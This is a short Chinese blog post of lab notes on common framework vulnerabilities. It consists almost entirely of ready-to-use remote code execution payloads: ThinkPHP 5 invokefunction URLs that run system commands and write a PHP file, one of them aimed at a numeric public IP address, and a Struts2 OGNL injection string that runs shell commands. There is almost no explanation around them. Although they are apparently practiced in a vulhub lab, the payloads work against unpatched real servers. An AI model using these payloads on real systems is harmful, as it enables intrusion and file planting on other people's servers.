常见框架漏洞

还好160

于 2024-08-07 21:31:36 发布

阅读量265

点赞数 8

文章标签：安全

本文链接：https://blog.csdn.net/weixin_66503195/article/details/141001592

版权

框架

Thinkphp(TP)

vulhub/thinkphp/5-rce

docker-compose up -d启动环境

/index.phps=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

/index.phps=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

http://8.152.3.217:8080/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php phpinfo();?>' >>1.php

测试链接

struts2

打号靶场进来

/struts2-showcase

${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#ct=#request['struts.valueStack'].context).
(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).
(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).
(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('whoami')).
(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}